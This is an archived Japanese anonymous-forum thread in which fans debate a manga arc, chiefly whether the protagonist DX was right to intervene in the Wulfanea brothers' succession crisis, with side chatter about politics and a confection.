
ただDXにも継承候補というれっきとした責任があるわけで、その点ではやはり竜葵に肩入れしたいw
(DXも今回とうとう自分の意思で背負ってしまったが)

144 :花と名無しさん:2007/11/28(水) 20:54:41 ID:???0
兄弟がお互いに言葉足らずだったってだけのオチのような…
とりあえずウルファネア編終わりが見えてきてよかった

145 :花と名無しさん:2007/11/28(水) 21:17:27 ID:???0
最初からそうだったじゃないか。

それを「そんなわからずやの兄貴は俺が一杯くわしちゃる」と思ったわからずやのDXがわからずやなやり方でクビ突っ込むからここまでややこしくなった。

146 :花と名無しさん:2007/11/28(水) 21:29:49 ID:???0
言葉足らずの兄弟が言葉を惜しまない状況を作るために
わからずやの第三者がひっかきまわす必要があった、ってことなんじゃないかなストーリー的に。
権力という名の魔法のステッキをがらくた箱に突っ込んでたDXも
ようやく取り出してマニュアル読み始めた所って感じだし、
ウルファネア編が終わった時、それぞれが少しずつ成長できてるといいね。

147 :花と名無しさん:2007/11/28(水) 21:55:11 ID:???0
>145
DXが首突っ込んでなかったら、
竜胆はしおしおのぷうになるまで岩にくっついてるか、
見かねた兄ちゃんにずんばらりされて終わるがな。

いやそもそも帰るように煽ったところからDXのせいだって
言われたら返す言葉もないがw

148 :花と名無しさん:2007/11/28(水) 21:58:06 ID:???0
放置しても死ぬ、迂闊に弄ると竜脈暴走で被害甚大だったら
早くラクにしてやれって選択肢もアリといえばアリなんじゃないかな。
「頑張れば上手く解決できる方法があるのに
兄ちゃんがめんどくさがって斬ろうとしてた」ってわけじゃないんでしょ?

149 :花と名無しさん:2007/11/28(水) 22:14:00 ID:???0
解決したのはDXが首突っ込んだというより
ウールンというおまけが偶然ついてきたおかげだな。竜胆達は運がいい
DXが引っかき回した時には事態はすでに手遅れだったとも言える
下手すりゃ被害者が竜胆とDXの二人になってた

150 :花と名無しさん:2007/11/28(水) 22:56:23 ID:???0
DXがアカデミーに来なければ竜胆がアカデミーでぼちぼちやってる間に兄上が無事に儀式を済ませてた気もするがw
あの兄上なら意地だけで成功させるだろう。国にとってはそのほうがよかったかもしれない。
でもまあ兄上や竜胆という個人レベルだったらひっかきまわしてもらってよかったんだろうなあ。
五十四さんは斬られ損だけどさ

151 :花と名無しさん:2007/11/28(水) 23:20:35 ID:???0
ウールンが王族だから謝れないことには配慮できるのに
体裁とか当主のメンツとかそういうのはくだらないって思っちゃうのは何でだろう。
どっちも同じようなものだと思うんだけど。

152 :花と名無しさん:2007/11/28(水) 23:23:02 ID:???0
そもそも竜胆はなんで竜葵の実力に不安を抱くような事になったんだ?
誰かそういう事をほのめかしたりしたのかしらん。

153 :花と名無しさん:2007/11/28(水) 23:33:41 ID:???0
>>151
比較の問題じゃない?
体裁とかメンツを絶対評価でくだらないと思っているわけじゃなく
相対評価で、それより大事なものがあるだろう、と思ってるんじゃないかな

154 :花と名無しさん:2007/11/28(水) 23:56:21 ID:???0
んー、ウールンがいざ危険になったら身を引くぞって言って
王族の義務>>>竜胆だよって目の前でしれっと宣言してるのになぁ。
兄貴が竜胆より家の都合を考えるのも同じだと思ってあげられないのかな。
大事なものがある人は当主にならないし、なっちゃったら捨てるんだろうって。

155 :花と名無しさん:2007/11/29(木) 00:00:52 ID:???0
DXは基本的に自分が正しいと思ってるからな

156 :花と名無しさん:2007/11/29(木) 00:02:27 ID:???0
DXは超絶シスコンだから、兄弟の仲が断絶してるのが
感覚的に許せないってのもあったんじゃないかとwってのは冗談として。

ウールンが竜胆の為に無理はしないことに対しては、そりゃ配慮するだろう。
ウールン自身には竜胆に何の義理もないわけだし。
結局、体裁整える為に竜胆(と凪ママ)が割り食ってるってのは事実だ。
領主としての面子が大事なことくらいDXだって解らないほどバカタレじゃないだろうけど、
歩み寄る努力しなかった上で貧乏くじ引く友人を見過ごせないってのは自然な感情でない?

157 :花と名無しさん:2007/11/29(木) 00:24:36 ID:???0
別に竜葵が自分の体裁整える為に竜胆に割を食わしてたわけじゃなかったと思うんだが。
国の情勢が微妙な時期に入っちゃったんで、
安定するまでは兄弟や身内の融和よりも国の大事を優先させたって事だろ。

そもそもこの兄弟のコミュニケーション不足が今回の事態をややこしくしたのは確かだろうが、
その際に歩み寄る努力をしなかったなんてDXが責める筋合いなんて何もないと思うが。
そもそも実際そういう事実があったとしても、
DXが最初からそれを把握してたなんて事は有り得ないし。

158 :花と名無しさん:2007/11/29(木) 00:32:39 ID:???0
気持ちはわかるが偏ってはいると思う
兄上は確かに歩み寄ってないが竜胆側からも歩み寄ってないし、公平ではないよな。
まあ竜胆は友達だし兄上は友達じゃないから前提が公平じゃないけど。

今の竜胆って状況としてはマリオンと一緒なんだよね。助ける方法はないわけじゃないけど仕損じたら最悪領民全部道連れ。
ぶっちゃけ領主の息子として「正しい」対処はDXより竜葵のほうだと思う。
まあ一貫はしてるしDXはそれでこそDXだから悪いわけではないんだけど…

159 :花と名無しさん:2007/11/29(木) 00:34:29 ID:???0
歩み寄る努力をしなかったなんてDX基準で言ってるんだしね。
世の中にはえらく不器用な人もいるんだなと思えないのかな。

結局は子供の理屈だし、だったら子供っぽいアプローチで行けばいいのに。
「トモダチだから竜胆助けたいよぅヽ(`Д´)ノウワァァン」とだけ言っておいて
後は同じように大乱闘コースで良かった。
DXがウルファネアの大人達に筋違いの説教かますか否かでずいぶん印象が違う。

160 :花と名無しさん:2007/11/29(木) 00:59:19 ID:???0
>>159
>歩み寄る努力をしなかったなんてDX基準で言ってるんだしね。
今月号読んでないんだけどこんなこと言ったの?DX

主人公がまったく偏った思考をせず、ただの客観的な傍観者になったら
冒険漫画としてはよほど上手に描かないと実につまらんもんになりそうだけどな
大体DXはまだのびしろの方が多いぐらいの子供だし独善的でもしかたない

161 :花と名無しさん:2007/11/29(木) 01:06:42 ID:???0
>>149
個人的にいちばん運が良かったと思ったのは、DXが失敗しそうになって、最後の最後に
しっかり竜葵が締めたことだった。

領主を差し置いて国家の要衝たる儀式(に類するもの)をしれっとこなされたのでは、
立場ないもんな。

162 :花と名無しさん:2007/11/29(木) 01:10:52 ID:???0
>>160
なるほど、アメリカ製SFドラマみてる気分で楽しめばいいわけか。
偉大なるアメリカマンセー、色んな星に出掛けて行って
現地の問題解決してあげるついでに価値観も押し付けますよ、と。

163 :花と名無しさん:2007/11/29(木) 01:11:14 ID:???0
まぁ竜葵もあれで相当融通がきかないタイプではあるんだろうな。
今月、一旦剣を下ろしただけで皆びっくりしてるくらいだしw

しかし随分前、
竜胆がDXに「DXが何をしようとしているのかわからないから、
六甲はDXを守ることしか考えないんだぞ」みたいな説教してたが、
今になって考えると、色々と面白いな。

164 :花と名無しさん:2007/11/29(木) 01:22:53 ID:???0
>>159
不器用でぶった斬られたらたまらんw
筋違いの説教も、子供ゆえの若気の至りってことでひとつ。

165 :花と名無しさん:2007/11/29(木) 01:34:14 ID:???0
猫耳風邪さえひかなければこんなことには・・・

166 :花と名無しさん:2007/11/29(木) 01:36:13 ID:???0
一のおっさんもだけど、アンちゃんも胃に穴が開きそうだ

167 :花と名無しさん:2007/11/29(木) 04:24:07 ID:???0
腰のタオル……

168 :花と名無しさん:2007/11/29(木) 05:25:16 ID:???0
まっぱじゃないの?

169 :花と名無しさん:2007/11/29(木) 09:17:51 ID:???0
改めて読み直してみて、一のおっさんに幸あれと思った。

170 :花と名無しさん:2007/11/29(木) 10:28:27 ID:???0
>>166
アンちゃんは自分で(嫌がる)DXを選んだんだから仕方がないw

171 :花と名無しさん:2007/11/29(木) 11:58:50 ID:???0
靴を拾いに行った時に、腰にあったはずのタオル消えてたなww
来月あたりでウルファネアの本物の露天風呂見て、DXが間違いに気付くんだろうか。

172 :花と名無しさん:2007/11/29(木) 17:56:35 ID:???O
>>162
残念なことに雑誌の購買層というか読者層を考えるとそれでほぼ正しい気がする
ゼロサムって典型的な腐及び厨二がメインターゲットの雑誌だし

173 :花と名無しさん:2007/11/29(木) 18:49:27 ID:???0
楽しみ方なんて人それぞれだし、別に残念でもなんでもないと思うが。

174 :花と名無しさん:2007/11/29(木) 21:25:07 ID:???0
>>162
おがきちか作品って大体そうゆうものじゃなかったっけ?

エビアンは銀符だから不問だったけど
ランドリは個人ではなく国とかが関係しちゃうから、より公正で公平な解決のさせ方は無かったのかという話になる

175 :花と名無しさん:2007/11/29(木) 22:04:41 ID:???0
基本的に善人は善人、悪人は悪人、みたいな描き方してる人だしなー
政治的な面を描こうとすると大味になっちゃうのかも
もっと規模の小さい個人レベルのドラマの方が面白いかなと思う
竜退治だってDXの恋から始まった話だし

176 :花と名無しさん:2007/11/29(木) 22:14:42 ID:???0
DX以外の人たちの善人っぷりに感心する作品だわなw
みんな何ていい人たちなんだろう

177 :花と名無しさん:2007/11/29(木) 22:27:02 ID:???0
ああ、何故かよつばとに似ていると感じるのはそのせいかw

178 :花と名無しさん:2007/11/29(木) 22:28:24 ID:???0
とりあえず革命の真実がわかるまでは

179 :花と名無しさん:2007/11/29(木) 23:23:51 ID:???0
詳しくじゃなかったけど、王を殺したってのじゃないの?

180 :花と名無しさん:2007/11/29(木) 23:48:09 ID:???0
>>174
んなこたーない。

181 :花と名無しさん:2007/11/30(金) 00:11:06 ID:???0
今のゼロサムから続きが読めるんだよね?

182 :花と名無しさん:2007/11/30(金) 00:14:15 ID:???0
そ。

183 :花と名無しさん:2007/11/30(金) 09:25:09 ID:???0
でもまあ、小泉とブッシュみたいに、国が云々という問題が
トップ同士の親交に拠ることもあったりするし。

184 :花と名無しさん:2007/12/01(土) 22:09:44 ID:???0
↑まさか本気で言ってるわけじゃないよね?

185 :花と名無しさん:2007/12/01(土) 23:06:24 ID:???0
福田と藪よかよかったんじゃない?
オジャワは論外で。

186 :花と名無しさん:2007/12/02(日) 00:01:53 ID:???0
どうであってもスレ違い

187 :花と名無しさん:2007/12/02(日) 11:02:03 ID:???0
でもまあ、守屋と宮崎みたいに、国防のための平気の調達商社が
実力者同士の親交に拠ることもあったりするし。

188 :花と名無しさん:2007/12/02(日) 13:29:06 ID:???0
違う板の違うスレ見てるかとおもってスレタイ確認したんだぜ。

189 :花と名無しさん:2007/12/02(日) 14:03:47 ID:???0
>187
アレは今出てきてる話だけでもそんな単純な話じゃないし、
もっと古くから続いてて根も深い話だし。

いずれにしても政治と防衛利権談合の絡みを議論してもしょうがないわけで、
更に制度もその思想背景も違う政治形態のものと現代政治を比較してもしょうがない。
従ってきっかけとなった>183の例えは不適切で、しかも例えてる内容については、
オマエはもうょっと新聞なりそのテの本なりを読めということで、
話を作品に戻そうや。。

190 :花と名無しさん:2007/12/02(日) 17:40:58 ID:???0
水戸黄門的な本人乗り込み型外交はどうなの?って話だっけ

191 :花と名無しさん:2007/12/02(日) 17:44:55 ID:???0
でも将来、DXが偉くなったときにライナスの商家に便宜を図るように
なったらそれは?

192 :花と名無しさん:2007/12/02(日) 20:41:21 ID:???0
「ライナス屋、そちもワルよのぅ」
「いえいえ、DX様ほどではござりませぬ」
「ほっほっほ」
「ふっふっふ」

193 :花と名無しさん:2007/12/02(日) 21:03:42 ID:???0
>>192
そこで銘菓「山吹色のお菓子」の出番ですよ。


194 :花と名無しさん:2007/12/02(日) 21:14:43 ID:???0
>>193
気が付いたらイオンとDXで全部食ってしまっていそう。

195 :花と名無しさん:2007/12/02(日) 21:37:47 ID:???0
あれはネタとしても美味しいが、普通に美味しそうだから困る。
何度購入ボタンに手が滑りそうになったか……

そういや、リドはお家騒動が片付いてもアカデミーに戻って来るんだろうか。

196 :花と名無しさん:2007/12/02(日) 22:17:48 ID:???0
購入ボタン?

197 :花と名無しさん:2007/12/02(日) 22:37:47 ID:???0
>>196
甘過ぎない胡麻風味和風パイらしい
http://www.yamabukiiro.com/

198 :花と名無しさん:2007/12/02(日) 23:22:26 ID:???0
玉虫色の回答集に吹いたw
と、これだけじゃなんなので。

>>192
「カディス屋ライナス」のほうがしっくりくるなあ

199 :花と名無しさん:2007/12/03(月) 01:17:37 ID:???0
うん、山吹色ほんと、美味しいよ。
ふんわりうまうま、そんな感じ。
自分で食べて美味しかったんで友人にも送ってネタも味も喜ばれたよー。

200 :花と名無しさん:2007/12/03(月) 02:40:23 ID:???0
11巻買って来た〜。

なんと!

201 :花と名無しさん:2007/12/03(月) 03:28:47 ID:???0
すいちょうけん!

202 :花と名無しさん:2007/12/03(月) 03:35:09 ID:???0
ほくと!

203 :花と名無しさん:2007/12/03(月) 03:40:38 ID:???0
>202
http://www.youtube.com/watch?v=UouH85QGl2E

204 :花と名無しさん:2007/12/03(月) 12:34:33 ID:???0
むう、最初から身分あかして正面からの交渉するやり方だと
五十四さんの生き残る目が限りなくゼロだったという一点のせいで
DXを非難できん自分。

DXが最初から、それを考慮していたとは思えないが
(無意識レベルはともかく)
六甲とアンは比較的早い時期に分かってたよね?

205 :花と名無しさん:2007/12/03(月) 12:50:59 ID:???0
分かってたって何が?

206 :花と名無しさん:2007/12/03(月) 14:03:22 ID:???0
最初から正攻法だと完全に内政干渉(しかも事が世継ぎ問題)になるわけで、
リドを助けるだけでも、どのみち潜入工作しかなかったと思うよ。

DXが責められてるのはどっちかというと礼儀知らずだったりw
相手の事情を忖度しなかったりってところじゃまいか。

207 :花と名無しさん:2007/12/03(月) 15:09:36 ID:???0
身分を明かしてしまうなら正攻法の方がいいよどう考えても

どっちみち潜入でも内政干渉になるんだから
最初から正攻法の方が兄貴その他にいらん恥かかせなくてすむし
相手方の心証も変わってくる
でもそれじゃ五十四さんが…てことでしょ




208 :花と名無しさん:2007/12/03(月) 15:32:32 ID:???0
最後まで身分を明かさずにいたら、確かにギリギリ内政干渉じゃ
なかったかもしれないね。

209 :花と名無しさん:2007/12/03(月) 16:44:20 ID:???0
>207
>身分を明かしてしまうなら正攻法の方がいいよどう考えても
そうとも言いきれんよ。そもそも正攻法と言うが、
そんな勝手な外交交渉をDX個人の判断で行える権限があるのかって話になるし、
よしんばそれが可能でも、
双方の事務方の行き来から前交渉、双方の準備と使節団の編成とやってたら、
時間ばかりかかった挙句に、事は相手のお家騒動だし、
どれほどの成果が上がるか極めて怪しい。

もう少し柔軟に即効に進めたとしても、
やはり相手に準備させてしまうだけの時間と手順はかかるだろうし。

別にDXがそこまで考えて行動したとは思わんが、
リドも助け、五十四さんも助けるには上で誰かが言ってた「水戸黄門方式」しかなかったと思うw
あと、それにしても無礼極まりないだろってのには同意w


210 :花と名無しさん:2007/12/03(月) 16:51:14 ID:???0
よくよく考えると、
現時点でウルフアネア側の面々にとって一番正体不明で深刻に何者かと不気味なのは、
DXからウールンに移ってるよな。
事情が分かってないだけに、
すげぇ!この子供を引き取っていずれは竜葵さまの側室に…とか考える輩が出てきたりして。

あと遅レスだが>175
たまにわかり易い悪党は居るが、
むしろこの作者はそこのところ単純にしないタイプだと思うぞ。
敵対した側の事情や考えもちゃんと構築してるし。

211 :花と名無しさん:2007/12/03(月) 17:36:10 ID:???0
>>150
DXがウルファネアへ行って成し得たことは
竜胆と竜葵に本音を伝え合うように煽った事なんだよ


212 :花と名無しさん:2007/12/03(月) 18:12:09 ID:???0
DXに言われるまでもなく竜胆はそのつもりで帰ったのでは?

213 :花と名無しさん:2007/12/03(月) 19:42:37 ID:???0
竜胆は言う過程をすっとばして先に行動しちゃったからなぁ。

214 :花と名無しさん:2007/12/03(月) 21:04:58 ID:???0
儀式に失敗したからDXが駆けつけたのは結果オーライだけど
よく考えたら自信をもって決断して帰った竜胆を全然信用してない行動だわな
兄貴たちのみならず竜胆に対しても失礼な奴め

215 :花と名無しさん:2007/12/03(月) 21:32:58 ID:???0
儀式に挑むと予想してたのか?

216 :花と名無しさん:2007/12/03(月) 21:48:42 ID:???0
儀式に挑むとは知らなかっただろうけど
竜胆が「私は大丈夫」「だから手紙には何も書かなかったのに」「上手くやるつもりだった」
と言ってる以上、あーあオイラってばそんなダメダメと思われてたのかよーとちょっとガッカリしたと思う
竜胆カワイソス

217 :花と名無しさん:2007/12/03(月) 22:11:48 ID:???0
なんだかなぁ・・・

218 :花と名無しさん:2007/12/03(月) 22:20:42 ID:???0
心配してくれる友人にいちいちそんなこと思わんよ。

219 :花と名無しさん:2007/12/03(月) 23:07:08 ID:???0
だよな。
どんなサムい人生生きてるんだと。


220 :花と名無しさん:2007/12/03(月) 23:16:33 ID:???0
この分だと滞り無く竜葵が領主になって
竜胆は兄にアカデミーに戻ることを許されそう
五十四さんも新学期までには歩けるようになるだろうし

221 :花と名無しさん:2007/12/03(月) 23:18:04 ID:???0
こうしてアトルニアからの一行は一陣の風の如く去っていったのであった。
一の胃にいくつかの穴を残して。

222 :花と名無しさん:2007/12/03(月) 23:25:32 ID:???0
DX一行がアトルニアを出発して何日経ったっけ
アカデミーのガーデンパーティーの日はまだ来てない計算になる?

223 :花と名無しさん:2007/12/03(月) 23:34:48 ID:???0
>>218-219
ここぞって時は自分で頑張ろうという気持ちは沸かんのか
気合入れた初デートに友達が「お前じゃ心配だから」って後つけてきて見守られたり
仕事の大事な場面で上司に「お前じゃ心配だから」って補佐つけられたりしたら凹まないか?


224 :花と名無しさん:2007/12/03(月) 23:56:19 ID:???0
もうね。何と言っていいやら…。

225 :花と名無しさん:2007/12/04(火) 00:30:41 ID:???0
>>223
その例えに無理やりのっかるなら、
気合入れた初デートor仕事の大事な場面だと、
友達or上司に伝えていない状況だったわけだが。

226 :花と名無しさん:2007/12/04(火) 00:37:10 ID:???0
信用するしないと心配するしないは別物だろ。
行き過ぎた心配も、信用してないせいじゃないし。

というか、DXが「心配のしすぎで友達のお家問題にまで口だしちゃうキャラ」だから
そういう展開になったんだ、ってことじゃだめなの?
友達いなかったんだから、距離つかむのだってさぐりさぐりだろうし。
常識的に問題のない行動や矛盾のない行動をとることが大事なんじゃなくて
そのキャラがどうそのキャラらしく動くかが大事なんだから
いろいろ手落ちがあったっていいじゃないか。作者の計算のうちなんだろうし。

227 :花と名無しさん:2007/12/04(火) 01:00:32 ID:???0
アカデミーが自分を利用して、竜胆を国に帰したのを知って、
DXは、アカデミーは竜胆を見捨てたんだと思って、
実際に危なくなってるかどうかはともかく
自分は見捨てたわけじゃないって意思を示そうとしたんだよね・・・?

竜胆が危険じゃなかったら、何にもしないで帰ったんじゃないの。

228 :花と名無しさん:2007/12/04(火) 01:01:07 ID:???0
まぁなんか自分のコンプレックスと混同しちゃってるんだろう。

229 :花と名無しさん:2007/12/04(火) 01:11:15 ID:???0
>>223
デートでもなけりゃ仕事で上司と部下でもないしなあ。

というか「お前 が 心配だから」というケースについて
「お前 じゃ 心配だから」という例を出されても。

230 :花と名無しさん:2007/12/04(火) 01:13:21 ID:???0
>229がいい事言った。

231 :花と名無しさん:2007/12/04(火) 01:22:36 ID:???0
>214
駆けつけたのは五十四さんが、六甲に助けて欲しいって伝言したのを
知ったからだろ?
よく読め

232 :花と名無しさん:2007/12/04(火) 14:07:18 ID:???0
身分を明かしてしまった以上、どう風呂敷を畳むかの勝負になって
くるわけだが。
あとはアンちゃんの活躍がまだだし、その辺も楽しみ。

ウールン様は放っておいても活躍しそう。

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)